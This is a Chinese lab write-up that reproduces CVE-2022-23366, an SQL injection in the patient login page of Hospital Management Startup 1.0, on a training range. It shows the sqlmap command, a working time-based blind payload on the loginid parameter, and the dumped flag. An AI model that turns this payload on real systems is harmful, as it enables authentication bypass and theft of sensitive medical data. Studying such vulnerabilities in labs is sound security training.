Hospital Management Startup 1.0 SQL 注入漏洞(CVE-2022-23366)

前言

CVE-2022-23366是一个影响HMS v1.0的SQL注入漏洞。该漏洞存在于patientlogin.php文件中,允许攻击者通过特定的SQL注入来获取或修改数据库中的敏感信息。

具体来说,攻击者可以通过向patientlogin.php发送恶意构造的SQL语句来绕过身份验证,访问受保护的数据,甚至可能修改或删除数据库中的数据。此漏洞的CVSS v3评分为9.8,表明其严重性极高,因为无需认证就能被远程利用,且会导致高度的机密性、完整性和可用性影响​ (MITRE CVE)​​ (Tenable®)​。

该漏洞的详细信息和修复措施可以在Packet Storm Security和GitHub上找到。这些资源提供了更多技术细节和补救措施,建议用户尽快更新或修复受影响的系统。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。

漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。

教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。

竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。

资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Hospital Management Startup (HMS) v1.0 是一个用于医疗机构管理的软件系统,旨在简化和优化医院的日常运营和管理。以下是其主要功能和特点:

主要功能

  1. 患者管理

    • 提供详细的患者信息记录,包括基本信息、病历、治疗记录等。
    • 支持患者入院、出院和转院管理。
  2. 预约系统

    • 提供在线预约功能,患者可以方便地预约医生。
    • 医生可以查看和管理预约信息,安排日程。
  3. 医生管理

    • 记录和管理医生的详细信息,包括资格、专长和工作安排。
    • 支持医生的绩效评估和工作记录管理。
  4. 药品管理

    • 记录药品库存和使用情况,包括药品的采购、库存管理和分发。
    • 提供药品使用报告,帮助医院进行库存管理。
  5. 财务管理

    • 管理医院的财务收支,包括挂号费、治疗费和药品费等。
    • 提供财务报告和统计分析,帮助医院进行财务规划。
  6. 实验室管理

    • 管理实验室检验项目和结果,记录患者的检验报告。
    • 提供检验数据分析,辅助医生诊断和治疗。
  7. 病房管理

    • 管理病房信息,包括病房分配、使用情况和维护记录。
    • 实时监控病房状态,优化资源配置。

优势

  • 提高管理效率:通过信息化管理,减少人工操作,提高工作效率和准确性。
  • 优化患者体验:提供便捷的预约和就诊服务,提升患者满意度。
  • 数据安全:通过权限管理和数据加密,确保患者信息和医院数据的安全。
  • 支持决策分析:提供详细的统计分析和报告,辅助医院管理层进行决策。

应用场景

  • 综合医院:适用于大中型综合医院,提升医院的管理效率和服务质量。
  • 专科医院:适用于专科医院,根据需要定制功能,专注特定领域的管理。
  • 诊所和门诊部:适用于小型医疗机构,提高日常运营的效率。

总结

Hospital Management Startup (HMS) v1.0 是一款全面的医疗管理软件,致力于通过信息化手段优化医院的管理流程,提升工作效率和服务质量。它适用于各种类型和规模的医疗机构,是现代医院管理的理想选择。

漏洞复现

打开靶场

网上搜索了一下关于这个 CVE 的详细信息 

进入靶场后页面长这样

在导航栏 LOG IN 中发现下拉导航栏有与目标漏洞文件关联的选项 

随便输入数值,登录时使用 BurpSuite 开启拦截数据包

复制数据包的值到 txt 文件中 

使用 SQLMap 开跑

D:\CVE\sqlmap-master>python sqlmap.py -r sqlmap-post.txt -D “ctf” -T "flag" -C "flag" --dump_____H_____ ___[.]_____ ___ ___  {1.8.6.17#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 23:12:45 /2024-07-03/[23:12:45] [INFO] parsing HTTP request from 'sqlmap-post.txt'
[23:12:45] [INFO] resuming back-end DBMS 'mysql'
[23:12:45] [INFO] testing connection to the target URL
[23:12:47] [WARNING] the web server responded with an HTTP error code (502) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: loginid (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: loginid=admin' AND (SELECT 6249 FROM (SELECT(SLEEP(5)))gTyH) AND 'YjsK'='YjsK&password=123456&submit=Login
---
[23:12:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:12:47] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[23:12:47] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'ctf'
[23:12:47] [INFO] resumed: 1
[23:12:47] [INFO] resumed: flag{a17af7eb-5fd8-4069-bb42-7335ed8c6b97
Database: ctf
Table: flag
[1 entry]
+-------------------------------------------+
| flag                                      |
+-------------------------------------------+
| flag{a17af7eb-5fd8-4069-bb42-7335ed8c6b97}|
+-------------------------------------------+[23:12:47] [INFO] table 'ctf.flag' dumped to CSV file 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeaey91a1p0r8n85s0e.cloudeci1.ichunqiu.com\dump\ctf\flag.csv'
[23:12:47] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 1 times
[23:12:47] [INFO] fetched data logged to text files under 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeaey91a1p0r8n85s0e.cloudeci1.ichunqiu.com'[*] ending @ 23:12:47 /2024-07-03/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/43807.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Joblib 是一个专注于高效计算和数据持久化的 Python 库

目录 01Joblib 是什么? 为什么选择 Joblib? 安装与配置 02Joblib 的基本用法 并行计算 数据持久化 03实战案例 项目简介 项目结构 依赖安装 应用代码 运行应用 …

FunAudioLLM SenseVoice语音转录与CosyVoice语音合成及语音克隆使用案例

参考: https://fun-audio-llm.github.io/ 1、SenseVoice语音转录 在线体验:https://modelscope.cn/studios/iic/CosyVoice-300M 参考:https://github.com/FunAudioLLM/SenseVoice 下载: pip install -U funasr使用: from funasr import AutoModelmodel_dir = "…

怎么将几首音乐合并在一起?这四种合并方法大家都在用!

怎么将几首音乐合并在一起?在音乐的海洋中遨游时,我们是否曾被音乐的海洋所淹没?在享受旋律的流转中,我们是否频繁地在不同的曲目间穿梭,仿佛迷失在无尽的音符之中?但音乐数量的繁多,不仅带来了…

单对以太网连接器多场景应用

单对以太网连接器应用场景概述 单对以太网(Single Pair Ethernet,简称SPE)作为一种新兴的以太网技术,以其独特的优势在多个领域得到了广泛的应用。SPE通过单对电缆进行数据传输,支持高速数据传输,同时还能…

pdf容量大小怎么改,pdf容量太大怎么变小

在数字化时代,pdf文件因其稳定性和跨平台兼容性而成为工作、学习和生活中不可或缺的文件格式。然而,随着文件内容的丰富,pdf文件的体积也日益增大,给存储和传输带来了不少困扰。本文将为你详细介绍多种实用的pdf文件压缩方法&…

基于STM32的智能加湿器

1.简介 基于STM32的加湿器发展前景非常乐观,这主要得益于其在技术、市场需求、应用场景以及政策支持等多方面的优势。STM32微控制器具备强大的处理能力和丰富的外设接口,能够实现精确的湿度监测和智能化控制。基于STM32的加湿器可以根据环境湿度自动调节…

光学传感器图像处理流程(一)

光学传感器图像处理流程(一) 1. 处理流程总览2. 详细处理流程2.1. 图像预处理2.1.1. 降噪处理2.1.2. 薄云处理2.1.3. 阴影处理 2.2. 辐射校正2.2.1. 辐射定标2.2.2. 大气校正2.2.3. 地形校正 2.3. 几何校正2.3.1. 图像配准2.3.2. 几何粗校正2.3.3. 几何精…

7.9总结

容易推出当移动i与j时等价于j-i-1个左右交换,且每次交换逆序数的奇偶改变(无相同元素),假设有一个状态c,且a与b必须以等量的左右交换转移为c,则必须数量相同,元素相同(使用异或解决&…

如何忽略部分文件或者文件夹在git提交项目时

嗨,我是兰若,最近发现有些小伙伴在提交代码时,总是把不该提交的文件,比如说本地批跑的缓存文件给提交到了git上面,导致别人在拉取代码的时候,也会把这部分文件拉取到自己本地,从而导致和本地的缓…

Debezium报错处理系列之第114篇:No TableMapEventData has been found for table id:256.

Debezium报错处理系列之第114篇:Caused by: com.github.shyiko.mysql.binlog.event.deserialization.MissingTableMapEventException: No TableMapEventData has been found for table id:256. Usually that means that you have started reading binary log within the logic…

如何借助社交媒体影响者的力量,让品牌影响力倍增?

一、引言:为何社交媒体影响者如此关键? 在信息爆炸的今天,社交媒体已成为塑造消费者行为与品牌认知的重要渠道。社交媒体影响者,凭借其在特定领域的专业知识、庞大的粉丝基础及高度的互动性,成为了品牌传播不可忽视的…

kafka 消费者

消费者 消费者。消费者连接到Kafka上并接收消息,进而进行相应的业务逻辑处理。 消费组 消费者负责订阅Kafka中的主题,并且从订阅的主题上拉取消息。 消费组:每个消费者都有一个对应的消费组,每一个分区只能被一个消费组中的一个…

方法引用 异常 file

目录 一.方法引用 1.方法引用概述 2.引用静态方法 3.引用成员方法 i.引用其他成员方法 ii.引用本类成员方法 iii.引用父类成员方法 4.引用构造方法 5.其他调用方式 i.使用类名引用成员方法 ii.引用数组的构造方法 二、异常 1.异常的作用 2.异常的处理方式 i.JVM…

6.Python学习:异常和日志

1.异常的抓取 1.1异常的概念 使用异常前: print(1/0)使用异常后:错误提示更加友好,不影响程序继续往下运行 try:print(10/0) except ZeroDivisionError:print("0不能作为分母")1.2异常的抓取 第一种:如果提前知道可…

2020 ICPC Shanghai Site B. Mine Sweeper II 题解 构造 鸽巢原理

Mine Sweeper II 题目描述 A mine-sweeper map X X X can be expressed as an n m n\times m nm grid. Each cell of the grid is either a mine cell or a non-mine cell. A mine cell has no number on it. Each non-mine cell has a number representing the number of…

遍历请求后端数据引出的数组forEach异步操作的坑

有一个列表数据,每项数据里有一个额外的字段需要去调另外一个接口才能拿到,后端有现有的这2个接口,现在临时需要前端显示出来,所以这里需要前端先去调列表数据的接口拿到列表数据,然后再遍历请求另外一个接口去拿到对应…

生产环境中秒杀接口并发量剧增与负载优化策略探讨

✨✨谢谢大家捧场,祝屏幕前的小伙伴们每天都有好运相伴左右,一定要天天开心哦!✨✨ 🎈🎈作者主页: 喔的嘛呀🎈🎈 目录 引言 1. 实施限流措施 1.1 令牌桶算法: 1.2 漏…

红酒知识百科:从入门到精通

红酒,这个深邃而迷人的世界,充满了无尽的知识与奥秘。从葡萄的选择、酿造工艺,到品鉴技巧,每一步都蕴藏着深厚的文化底蕴和精细的技艺。今天,就让我们一起踏上这场红酒知识之旅,从入门开始,逐步…

gpt-4o看图说话-根据图片回答问题

问题:中国的人口老龄化究竟有多严重? 代码下实现如下:(直接调用openai的chat接口) import os import base64 import requests def encode_image(image_path): """ 对图片文件进行 Base64 编码 输入…

【刷题汇总 -- 求最小公倍数、数组中的最长连续子序列、字母收集】

C日常刷题积累 今日刷题汇总 - day0081、求最小公倍数1.1、题目1.2、思路1.3、程序实现 -- 穷举法1.2、程序实现 -- 辗转相除法 2、数组中的最长连续子序列2.1、题目2.2、思路2.3、程序实现 3、字母收集3.1、题目3.2、思路3.3、程序实现 4、题目链接 今日刷题汇总 - day008 1、…